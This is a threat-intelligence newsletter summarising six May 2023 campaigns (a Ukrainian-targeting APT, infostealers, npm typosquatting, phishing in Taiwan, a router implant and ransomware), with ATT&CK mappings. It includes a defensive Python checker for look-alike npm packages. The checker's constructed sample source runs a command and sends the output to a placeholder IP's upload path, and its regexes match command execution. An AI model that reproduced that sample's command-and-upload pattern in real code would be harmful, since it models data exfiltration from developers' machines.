The various threat intelligence stories in this iteration of Anomali Cyber Watch cover the following topics: APT, China, Data Leakage, Infostealers, Package Name Typosquatting, Phishing, and Ukraine. IOCs related to these stories are attached to the Anomali Cyber Watch and can be used to check logs for potentially malicious activity.
Figure 1 – IOC summary chart. This chart summarizes the IOCs attached to this magazine and provides a glimpse into the threats discussed.
The latest cyber news and threat intelligence
CloudWizard APT: The Story of Bad Magic Continues
(Post Date: May 19, 2023)
A newly discovered modular malware framework called CloudWizard has been active since 2016. Kaspersky researchers were able to link it to previously recorded advanced persistent threat activity: Operation Groundbait and the Prikormka malware (2008-2016), Operation BugDrop (2017), PowerMagic (2020-2022), and CommonMagic (2022). Like the earlier campaigns, CloudWizard targets individuals and diplomatic and research organizations in the Donetsk, Lugansk, Crimea, Central Ukraine, and Western Ukraine regions. CloudWizard’s two main modules encrypt and decrypt all communications and deliver the encrypted data to cloud- or web-based C2. Additional modules provide screenshot capture, microphone recording, keylogging, and more.
Analyst Comments: ESET researchers previously concluded that the actors behind Operation Groundbait were most likely operating within Ukraine, but Kaspersky researchers did not say whether they agree with this attribution. Wars and military conflicts drive additional cyber activity. All known CloudWizard indicators are available on the Anomali platform, and customers are encouraged to block them in their infrastructure.
MITRE ATT&CK: [MITRE ATT&CK] T1027 – Obfuscated Files or Information | [MITRE ATT&CK] T1140 – Deobfuscate/Decode Files or Information | [MITRE ATT&CK] T1555 – Credentials from Password Stores | [MITRE ATT&CK] T1056.001 – Input Capture: Keylogging | [MITRE ATT&CK] T1573 – Encrypted Channel
Tags: Actor:CloudWizard, APT, Target Country:Ukraine, Target Region:Donetsk, Target Region:Lugansk, Target Region:Crimea, Target Region:Central Ukraine, Target Region:Western Ukraine, Campaign:Operation BugDrop, Campaign:Operation Groundbait, Malware:Prikormka, Malware:CloudWizard, Malware:PowerMagic, Malware:CommonMagic, Target Industry:Diplomacy, Target Industry:Research, Abuse:OneDrive, File Type:DLL, File Type:VFS, File Type:LRC, Target System:Windows
Attacks on CapCut Users
(Post Date: May 19, 2023)
Several campaigns target users of the CapCut video editing software with typosquatted websites. Users in jurisdictions where this popular ByteDance product is banned (Taiwan, India, and several other countries) are particularly exposed, since they must look for it outside official channels. One campaign profiled by Cyble researchers delivers the Offx stealer. Another delivers BatLoader, which leads to RedLine Stealer and an Antimalware Scan Interface (AMSI) bypass tool; at the time of discovery, the sample was not detected by any antivirus engine.
Analyst Comments: Users should avoid downloading pirated software from unofficial websites. All known indicators related to this CapCut impersonation campaign are available on the Anomali platform, and customers are encouraged to block them in their infrastructure.
MITRE ATT&CK: [MITRE ATT&CK] T1566 – Phishing | [MITRE ATT&CK] T1059.001 – Command and Scripting Interpreter: PowerShell | [MITRE ATT&CK] T1204 – User Execution | [MITRE ATT&CK] T1027 – Obfuscated Files or Information | [MITRE ATT&CK] T1555 – Credentials from Password Stores | [MITRE ATT&CK] T1539 – Steal Web Session Cookie | [MITRE ATT&CK] T1552 – Unsecured Credentials | [MITRE ATT&CK] T1528 – Steal Application Access Token | [MITRE ATT&CK] T1113 – Screen Capture | [MITRE ATT&CK] T1486 – Data Encrypted for Impact | [MITRE ATT&CK] T1490 – Inhibit System Recovery | [MITRE ATT&CK] T1095 – Non-Application Layer Protocol | [MITRE ATT&CK] T1071 – Application Layer Protocol | [MITRE ATT&CK] T1567 – Exfiltration Over Web Service | [MITRE ATT&CK] T1041 – Exfiltration Over C2 Channel | [MITRE ATT&CK] T1562.001 – Impair Defenses: Disable or Modify Tools
Tags: Malware:Offx, Malware Type:Infostealer, Malware:BatLoader, Malware Type:Loader, Malware:RedLine, Disguise:CapCut, Target:CapCut Users, Technique:Phishing, Target Country:Taiwan, Target Country:India, File Type:EXE, File Type:BAT, Abuse:PowerShell, Target System:Windows
RAT Found Hiding in the npm Attic
(Post Date: May 18, 2023)
Malicious packages in the public npm repository went undetected for up to two months. The attacker used typosquatting and impersonated the names of well-known, legitimate packages, reused legitimate code, and included links to legitimate GitHub repositories. Researchers at ReversingLabs determined that the campaign aims to deliver a modified version of the open-source TurkoRat infostealer, which was used to steal user information and cryptocurrency wallets.
Analyst Comments: Development organizations should take steps to avoid mistyping dependencies and should scrutinize the functionality and behavior of the code they depend on. Organizations should be alert to suspicious combinations of code behavior, such as naming mismatches, command execution, hard-coded IP addresses, smaller-than-expected downloads, questionable versioning, and writing data to files. Indicators related to this TurkoRat campaign are available on the Anomali platform for checking for persistent infections and for historical reference.
MITRE ATT&CK: [MITRE ATT&CK] T1195.002 – Supply Chain Compromise: Compromise Software Supply Chain | [MITRE ATT&CK] T1036.005 – Masquerading: Match Legitimate Name or Location | [MITRE ATT&CK] T1036 – Masquerading | [MITRE ATT&CK] T1555 – Credentials from Password Stores
Tags: Malware:TurkoRat, Malware Type:Infostealer, Malware Type:Clipper, Abuse:npm, Technique:Supply Chain, Technique:Package Name Typosquatting, Actor:AliTefeli02, File Type:JS, File Type:EXE, Target Industry:Software Publishers, Target Industry:Cryptocurrency, Target System:Windows
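The review the analyst comments describe (look-alike package names, a repository link that does not match the package, command execution, hard-coded IP addresses, file writes) can be scripted for a pre-install check. The Python below is an added example, not code from ReversingLabs or Anomali; its popular-package list, regexes, 0.8 similarity threshold, and the sample manifest and source are all constructed for illustration.

```python
import re
from difflib import SequenceMatcher

# Well-known npm package names an attacker might imitate (constructed list, not exhaustive).
POPULAR = {"lodash", "express", "axios", "react", "chalk", "commander", "moment", "request"}

# Code behaviours the analyst comments call out, as regexes over JavaScript source.
SUSPICIOUS = {
    "command execution": re.compile(r"child_process|\bexecSync\s*\(|\bspawn\s*\("),
    "hard-coded IP address": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "writes data to file": re.compile(r"\bfs\.(?:writeFile|writeFileSync|appendFileSync)\b"),
}

def lookalike_of(name, popular=POPULAR, threshold=0.8):
    # Return the popular package `name` most resembles; None if it is exact or unrelated.
    if name in popular:
        return None
    best = max(popular, key=lambda p: SequenceMatcher(None, name, p).ratio())
    return best if SequenceMatcher(None, name, best).ratio() >= threshold else None

def suspicious_behaviours(source):
    # Sorted labels of the suspicious behaviours present in the package source.
    return sorted(label for label, rx in SUSPICIOUS.items() if rx.search(source))

def review_package(manifest, source):
    # Manifest checks (look-alike name/dependencies, repository mismatch) plus source checks.
    name = manifest.get("name", "")
    findings = []
    if (hit := lookalike_of(name)):
        findings.append(f"package name '{name}' resembles '{hit}'")
    for dep in manifest.get("dependencies", {}):
        if (hit := lookalike_of(dep)):
            findings.append(f"dependency '{dep}' resembles '{hit}'")
    repo = manifest.get("repository", {})
    url = repo.get("url", "") if isinstance(repo, dict) else str(repo)
    repo_name = url.rstrip("/").rsplit("/", 1)[-1].removesuffix(".git")
    if url and repo_name != name:
        findings.append(f"repository '{repo_name}' does not match package name '{name}'")
    findings.extend(f"source shows {label}" for label in suspicious_behaviours(source))
    return findings

# Constructed sample: a look-alike package whose manifest links to the genuine project's repo.
SAMPLE_MANIFEST = {
    "name": "lodahs", "version": "4.17.21",
    "repository": {"type": "git", "url": "https://github.com/lodash/lodash.git"},
    "dependencies": {"expres": "^4.18.0", "uuid": "^9.0.0"},
}
SAMPLE_SOURCE = ("const { execSync } = require('child_process'); const fs = require('fs');\n"
                 "fs.writeFileSync('/tmp/out.dat', execSync('hostname'));\n"
                 "fetch('http://203.0.113.5/upload');")
```

The similarity check is a heuristic that also flags legitimate names close to popular ones, so its output is a review queue, not a verdict.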
China-Taiwan Tensions Spike Cyberattacks on Taiwan
(Post Date: May 17, 2023)
In April 2023, rising geopolitical tensions between China and Taiwan led to increased cyberattacks against Taiwan via malicious emails and phishing URLs. Trellix researchers identified PlugX and other malware detections. The malicious emails targeted a variety of industries, with networking/IT, manufacturing, and logistics the most affected. The phishing URLs led to generic login pages, pages tailored to specific target companies, and multi-brand login pages, all aimed at collecting credentials. Three days after the peak in phishing email volume, PlugX RAT detections spiked, and other malware families such as Formbook, Kryptik, and Zmutzy were also sighted.
Analyst Comments: All employees must be trained on the risks of phishing, particularly how to identify such attempts and whom to contact if a phishing attack is identified. Unsolicited emails that ask recipients to enter their credentials by following a link may indicate a phishing attack. Host-based indicators related to this campaign are available on the Anomali platform, and customers are encouraged to block them in their infrastructure.
MITRE ATT&CK: [MITRE ATT&CK] T1566.002 – Phishing: Spearphishing Link | [MITRE ATT&CK] T1078 – Valid Accounts | [MITRE ATT&CK] T1574.002 – Hijack Execution Flow: DLL Side-Loading | [MITRE ATT&CK] T1056.001 – Input Capture: Keylogging | [MITRE ATT&CK] T1113 – Screen Capture
Tags: Malware:PlugX, Detection:BackDoor-PlugX, Detection:Trojan:Win32/Korplug, Malware:Kryptik, Malware:Zmutzy, Detection:Trojan-AutoIt, Malware:Formbook, Target Industry:Networking, Target Industry:Manufacturing, Target Country:Taiwan, Target Industry:Logistics, File Type:ISO, File Type:DLL, Target System:Windows
The Dragon Who Sold His Camaro: Analyzing Custom Router Implant
(Post Date: May 16, 2023)
Check Point researchers recently discovered a malicious firmware implant made for TP-Link routers. The implant is attributed to a Chinese state-sponsored group known as Camaro Dragon and resembles previously reported activity by the Mustang Panda group. The attacker trojanized the TP-Link firmware image by modifying two files and adding four files. The implant contains several malicious components, including Horse Shell, a custom backdoor that provides a remote shell, file transfer, and network tunneling, the latter making it easier to anonymize communications through chains of infected nodes.
Analyst Comments: Although the exact attack technique used to deploy the implant is unknown, it is important to keep network devices patched with the latest security updates. Indicators related to this campaign, together with the HorseShell implant detection YARA rules provided by Check Point, are available on the Anomali platform.
MITRE ATT&CK: [MITRE ATT&CK] T1005 – Data from Local System | [MITRE ATT&CK] T1090 – Proxy | [MITRE ATT&CK] T1082 – System Information Discovery | [MITRE ATT&CK] T1016 – System Network Configuration Discovery | [MITRE ATT&CK] T1573 – Encrypted Channel
Signature: CamaroDragon’s HorseShell Implant – YARA by Check Point
Tags: Actor:Camaro Dragon, Malware:Horse Shell, Detection:HorseShell, Malware Type:Backdoor, Malware Type:Implant, Actor:Mustang Panda, Source Country:China, Target Region:Europe, File Type:ELF, File Type:LOG, File Type:DAT, Target Device:TP-Link router, Target System:Linux
Newly Identified RA Group Compromises U.S. and South Korean Firms With Leaked Babuk Source Code
(Post Date: May 15, 2023)
RA Group is a new ransomware group that has been actively leaking victims’ data since April 2023 and uses a double extortion tactic. Talos researchers confirmed that the RA Group ransomware is based on the leaked Babuk ransomware source code. The ransomware is written in C++, appears to embed the target’s name, and uses the curve25519 and eSTREAM cipher hc-128 algorithms for encryption. The group’s first leaked victims were organizations in the United States and South Korea.
Analyst Comments: Ransomware is a constantly evolving threat, and the most fundamental defense is to have a proper backup and restore process in place to recover affected data without having to decrypt it. Data theft can be contained through segmentation, encryption of data at rest, and limiting storage of personal and sensitive data.
MITRE ATT&CK: [MITRE ATT&CK] T1486 – Data Encrypted for Impact | [MITRE ATT&CK] T1490 – Inhibit System Recovery
Tags: Actor:RA Group, Target Country:USA, Target Country:South Korea, Malware:Babuk, Detection:Win.Ransomware.Babuk, Malware Type:Ransomware, Malware:RA, Detection:Ransomware/Win.RA, Abuse:qTox, Abuse:TOR, Data Breach Site, Target Industry:Manufacturing, Target Industry:Wealth Management, Target Industry:Insurance, Target Industry:Pharma, File Type:EXE, File Type:GAGUP, Target System:Windows